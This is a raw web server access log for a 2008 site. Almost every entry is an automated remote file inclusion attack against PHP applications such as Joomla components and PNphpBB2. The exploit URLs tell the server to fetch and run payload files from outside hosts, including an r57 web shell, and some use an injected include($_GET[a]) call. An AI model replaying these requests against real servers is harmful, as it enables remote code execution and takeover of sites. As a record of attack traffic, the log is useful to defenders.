207.210.115.114 - - [29/Jul/2008:10:10:00 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://growlibear.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
64.185.237.20 - - [29/Jul/2008:10:10:36 -0700] "GET /logs/access_080313.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://artworkmarket.com/administrator/components/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
64.185.237.20 - - [29/Jul/2008:10:10:37 -0700] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://artworkmarket.com/administrator/components/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
88.84.151.157 - - [29/Jul/2008:10:10:40 -0700] "GET /logs/access_080321.log/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.icamotorediciones.es/administrator/includes/pcl/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.151.157 - - [29/Jul/2008:10:10:40 -0700] "GET /components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.icamotorediciones.es/administrator/includes/pcl/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.151.157 - - [29/Jul/2008:10:10:41 -0700] "GET /logs/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.icamotorediciones.es/administrator/includes/pcl/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.45.177.194 - - [29/Jul/2008:10:11:06 -0700] "GET /logs/access_080313.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=add%20this? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
207.45.177.194 - - [29/Jul/2008:10:11:07 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=add%20this? HTTP/1.1" 200 3694 "-" "libwww-perl/5.812" "www.dmulk.com"
207.45.177.194 - - [29/Jul/2008:10:11:07 -0700] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=add%20this? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
62.141.56.49 - - [29/Jul/2008:10:11:12 -0700] "GET /logs/access_080528.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.ctocnet-socal.org/registration/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.49 - - [29/Jul/2008:10:11:14 -0700] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.ctocnet-socal.org/registration/id2.txt?? HTTP/1.1" 200 18535 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.49 - - [29/Jul/2008:10:11:15 -0700] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.ctocnet-socal.org/registration/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.49 - - [29/Jul/2008:10:11:18 -0700] "GET /logs/access_080326.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.ctocnet-socal.org/registration/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.234.103 - - [29/Jul/2008:10:11:23 -0700] "GET /logs//?pg=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 200 58286 "-" "libwww-perl/5.811" "www.dmulk.com"
207.44.234.103 - - [29/Jul/2008:10:11:23 -0700] "GET /logs/access_080329.log//?pg=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.44.234.103 - - [29/Jul/2008:10:11:24 -0700] "GET //?pg=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 200 18375 "-" "libwww-perl/5.811" "www.dmulk.com"
207.44.234.103 - - [29/Jul/2008:10:11:29 -0700] "GET /logs/access_080315.log//?pg=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
195.22.94.70 - - [29/Jul/2008:10:11:30 -0700] "GET /logs/access_080224.log/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.icamotorediciones.es/administrator/popups/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
88.84.151.157 - - [29/Jul/2008:10:11:31 -0700] "GET /logs/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.icamotorediciones.es/administrator/includes/pcl/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.151.157 - - [29/Jul/2008:10:11:33 -0700] "GET /components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.icamotorediciones.es/administrator/includes/pcl/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.234.133.173 - - [29/Jul/2008:10:11:43 -0700] "GET /logs/access_080218.log/?sourcedir=http://www.freewebtown.com/cupu/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.44.234.103 - - [29/Jul/2008:10:11:51 -0700] "GET /logs//include.php?path=psp/user.php&site=psp/include.php?path=psp/user.php&site=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.44.234.103 - - [29/Jul/2008:10:11:51 -0700] "GET //include.php?path=psp/user.php&site=psp/include.php?path=psp/user.php&site=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
151.11.24.250 - - [29/Jul/2008:10:11:55 -0700] "GET /logs//components/com_sitemap/sitemap.html.php?mosConfig_admin_path=http://www.toxiii.com/includes/includes/m???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
151.11.24.250 - - [29/Jul/2008:10:11:55 -0700] "GET //components/com_sitemap/sitemap.html.php?mosConfig_admin_path=http://www.toxiii.com/includes/includes/m???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
87.118.110.139 - - [29/Jul/2008:10:12:01 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.ctocnet-socal.org/registration/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.213.245.1 - - [29/Jul/2008:10:12:02 -0700] "GET /logs/access_080329.log/lostpasswd.php?env[include_prefix]=http://inside-asia.com//templates/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.213.245.1 - - [29/Jul/2008:10:12:02 -0700] "GET /lostpasswd.php?env[include_prefix]=http://inside-asia.com//templates/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.213.245.1 - - [29/Jul/2008:10:12:02 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://inside-asia.com//templates/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.118.110.139 - - [29/Jul/2008:10:12:08 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.ctocnet-socal.org/registration/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.214.192.29 - - [29/Jul/2008:10:12:25 -0700] "GET /logs/access_080207.log//components/errors.php?error=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.213.245.215 - - [29/Jul/2008:10:12:25 -0700] "GET /logs/access_080329.log/lostpasswd.php?env[include_prefix]=http://server.classyhost.com/~pictures/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.213.245.215 - - [29/Jul/2008:10:12:25 -0700] "GET /lostpasswd.php?env[include_prefix]=http://server.classyhost.com/~pictures/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
88.214.192.29 - - [29/Jul/2008:10:12:26 -0700] "GET //components/errors.php?error=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.214.192.29 - - [29/Jul/2008:10:12:27 -0700] "GET /logs//components/errors.php?error=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.185.237.20 - - [29/Jul/2008:10:12:29 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://artworkmarket.com/administrator/components/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
207.213.245.215 - - [29/Jul/2008:10:12:29 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://server.classyhost.com/~pictures/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.234.103 - - [29/Jul/2008:10:12:35 -0700] "GET /logs/access_071225.log//include.php?path=psp/user.php&site=psp/include.php?path=psp/user.php&site=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.108.64.53 - - [29/Jul/2008:10:12:37 -0700] "GET /logs/access_080313.log/class.php?p=http://www.thecornerstone.net/calendar/languages/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
207.44.234.103 - - [29/Jul/2008:10:12:38 -0700] "GET /logs/access_080128.log//include.php?path=psp/user.php&site=psp/include.php?path=psp/user.php&site=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.108.64.53 - - [29/Jul/2008:10:12:43 -0700] "GET /logs/class.php?p=http://www.thecornerstone.net/calendar/languages/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
91.193.130.151 - - [29/Jul/2008:10:13:00 -0700] "GET /logs/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://grupo.e-sportv.com/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
91.193.130.151 - - [29/Jul/2008:10:13:00 -0700] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://grupo.e-sportv.com/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
87.106.191.163 - - [29/Jul/2008:10:13:01 -0700] "GET /logs/access_080315.log/errors.php?error=http://susanita.de/tests/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.191.163 - - [29/Jul/2008:10:13:02 -0700] "GET /logs/errors.php?error=http://susanita.de/tests/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.45.177.194 - - [29/Jul/2008:10:13:02 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=add%20this? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
210.245.87.117 - - [29/Jul/2008:10:13:14 -0700] "GET /logs/access_080313.log/?sourcedir=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.22.89.194 - - [29/Jul/2008:10:13:14 -0700] "GET /logs/access_071225.log//include.php?path=psp/user.php&site=psp/include.php?path=psp/user.php&site=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [29/Jul/2008:10:13:14 -0700] "GET /logs//include.php?path=psp/user.php&site=psp/include.php?path=psp/user.php&site=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [29/Jul/2008:10:13:14 -0700] "GET //include.php?path=psp/user.php&site=psp/include.php?path=psp/user.php&site=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [29/Jul/2008:10:13:14 -0700] "GET /logs/access_080128.log//include.php?path=psp/user.php&site=psp/include.php?path=psp/user.php&site=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
210.245.87.117 - - [29/Jul/2008:10:13:21 -0700] "GET /logs/access_080215.log/scanhttp://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.245.87.117 - - [29/Jul/2008:10:13:21 -0700] "GET /scanhttp://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.245.87.117 - - [29/Jul/2008:10:13:22 -0700] "GET /logs/scanhttp://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.59.181.100 - - [29/Jul/2008:10:13:31 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.59.181.100 - - [29/Jul/2008:10:13:31 -0700] "GET /logs/access_080117.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.59.181.100 - - [29/Jul/2008:10:13:31 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.97.201.148 - - [29/Jul/2008:10:13:44 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.97.201.148 - - [29/Jul/2008:10:13:44 -0700] "GET /logs/access_080117.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.97.201.148 - - [29/Jul/2008:10:13:44 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.125.211.84 - - [29/Jul/2008:10:13:45 -0700] "GET /logs/access.log//join.php?DOCUMENT_ROOT=http://www.horde-hunterz.co.uk/xoops/xoops/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.97.201.148 - - [29/Jul/2008:10:13:46 -0700] "GET /logs/access_080215.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.125.211.84 - - [29/Jul/2008:10:13:46 -0700] "GET //join.php?DOCUMENT_ROOT=http://www.horde-hunterz.co.uk/xoops/xoops/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.125.211.84 - - [29/Jul/2008:10:13:51 -0700] "GET /logs//join.php?DOCUMENT_ROOT=http://www.horde-hunterz.co.uk/xoops/xoops/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.152.41.170 - - [29/Jul/2008:10:14:01 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://shopsb.ru/THIEF/kiss/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.152.41.170 - - [29/Jul/2008:10:14:12 -0700] "GET /logs/access.log/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://shopsb.ru/THIEF/kiss/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.152.41.170 - - [29/Jul/2008:10:14:12 -0700] "GET /logs/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://shopsb.ru/THIEF/kiss/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.84.151.157 - - [29/Jul/2008:10:14:16 -0700] "GET /logs/access_080224.log/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.icamotorediciones.es/administrator/includes/pcl/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
160.99.12.231 - - [29/Jul/2008:10:14:17 -0700] "GET /logs/access_080329.log/lostpasswd.php?env[include_prefix]=http://genthal.com/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
160.99.12.231 - - [29/Jul/2008:10:14:17 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://genthal.com/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.59.181.100 - - [29/Jul/2008:10:14:19 -0700] "GET /logs/access.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.214.192.29 - - [29/Jul/2008:10:14:21 -0700] "GET /logs/access_080207.log//components/errors.php?error=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.214.192.29 - - [29/Jul/2008:10:14:22 -0700] "GET //components/errors.php?error=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.214.192.29 - - [29/Jul/2008:10:14:23 -0700] "GET /logs//components/errors.php?error=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.213.245.1 - - [29/Jul/2008:10:14:27 -0700] "GET /logs/access_080329.log/lostpasswd.php?env[include_prefix]=http://inside-asia.com//templates/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.213.245.1 - - [29/Jul/2008:10:14:29 -0700] "GET /lostpasswd.php?env[include_prefix]=http://inside-asia.com//templates/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.213.245.1 - - [29/Jul/2008:10:14:29 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://inside-asia.com//templates/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.106.191.163 - - [29/Jul/2008:10:14:43 -0700] "GET /logs/access_080315.log//common/db.php?commonpath=http://susanita.de/tests/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.191.163 - - [29/Jul/2008:10:14:44 -0700] "GET /logs//common/db.php?commonpath=http://susanita.de/tests/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.214.192.29 - - [29/Jul/2008:10:14:44 -0700] "GET /logs/access_071219.log//components/errors.php?error=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.186.5 - - [29/Jul/2008:10:14:45 -0700] "GET /logs/access_080320.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.geocities.com/lujonies/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.8.104 - - [29/Jul/2008:10:14:46 -0700] "GET /blog/index.php/2008/?show=gallery&nggpage=3 HTTP/1.0" 200 28386 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
212.92.23.89 - - [29/Jul/2008:10:14:48 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.fieldpaoli.com/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.186.5 - - [29/Jul/2008:10:14:51 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.geocities.com/lujonies/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.251.162.130 - - [29/Jul/2008:10:14:52 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.251.162.130 - - [29/Jul/2008:10:14:52 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.186.5 - - [29/Jul/2008:10:14:53 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.geocities.com/lujonies/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.251.162.130 - - [29/Jul/2008:10:14:53 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.251.162.130 - - [29/Jul/2008:10:14:53 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.85.89.114 - - [29/Jul/2008:10:14:55 -0700] "GET /logs/access_080313.log/index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://legalref.ru/config/idfx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
194.85.89.114 - - [29/Jul/2008:10:14:55 -0700] "GET /logs/index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://legalref.ru/config/idfx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
194.85.89.114 - - [29/Jul/2008:10:14:56 -0700] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://legalref.ru/config/idfx.txt??? HTTP/1.1" 200 3694 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
64.22.89.194 - - [29/Jul/2008:10:15:13 -0700] "GET /logs//?pg=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 200 58286 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [29/Jul/2008:10:15:13 -0700] "GET //?pg=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 200 18375 "-" "libwww-perl/5.812" "www.dmulk.com"
87.244.11.20 - - [29/Jul/2008:10:15:16 -0700] "GET /logs/access.log//index2.php?DOCUMENT_ROOT=http://tartufellinolol.altervista.org/piccino/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.244.11.20 - - [29/Jul/2008:10:15:16 -0700] "GET /logs//index2.php?DOCUMENT_ROOT=http://tartufellinolol.altervista.org/piccino/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.244.11.20 - - [29/Jul/2008:10:15:16 -0700] "GET //index2.php?DOCUMENT_ROOT=http://tartufellinolol.altervista.org/piccino/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.186.5 - - [29/Jul/2008:10:15:27 -0700] "GET /logs/access_080209.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.geocities.com/lujonies/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
205.234.232.195 - - [29/Jul/2008:10:16:01 -0700] "GET /logs/access.log//404.php?DOCUMENT_ROOT=http://www.brazebo.it/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
205.234.232.195 - - [29/Jul/2008:10:16:01 -0700] "GET /logs//404.php?DOCUMENT_ROOT=http://www.brazebo.it/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
205.234.232.195 - - [29/Jul/2008:10:16:02 -0700] "GET //404.php?DOCUMENT_ROOT=http://www.brazebo.it/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.243.169.10 - - [29/Jul/2008:10:16:11 -0700] "GET /logs/access_080315.log/index.php?x=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.213.245.215 - - [29/Jul/2008:10:16:31 -0700] "GET /logs/access_080315.log/errors.php?error=http://server.classyhost.com/~pictures/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.213.245.215 - - [29/Jul/2008:10:16:31 -0700] "GET /errors.php?error=http://server.classyhost.com/~pictures/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.213.245.1 - - [29/Jul/2008:10:16:34 -0700] "GET /logs/access_080315.log/errors.php?error=http://inside-asia.com//templates/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.213.245.1 - - [29/Jul/2008:10:16:34 -0700] "GET /errors.php?error=http://inside-asia.com//templates/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.213.245.1 - - [29/Jul/2008:10:16:35 -0700] "GET /logs/errors.php?error=http://inside-asia.com//templates/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.213.245.215 - - [29/Jul/2008:10:16:35 -0700] "GET /logs/errors.php?error=http://server.classyhost.com/~pictures/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.22.89.194 - - [29/Jul/2008:10:16:37 -0700] "GET /logs/access_080329.log//?pg=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
207.213.245.215 - - [29/Jul/2008:10:17:11 -0700] "GET /logs/access_080315.log//common/db.php?commonpath=http://server.classyhost.com/~pictures/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.213.245.215 - - [29/Jul/2008:10:17:11 -0700] "GET //common/db.php?commonpath=http://server.classyhost.com/~pictures/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.213.245.215 - - [29/Jul/2008:10:17:11 -0700] "GET /logs//common/db.php?commonpath=http://server.classyhost.com/~pictures/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
194.85.89.114 - - [29/Jul/2008:10:17:14 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://legalref.ru/config/idfx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
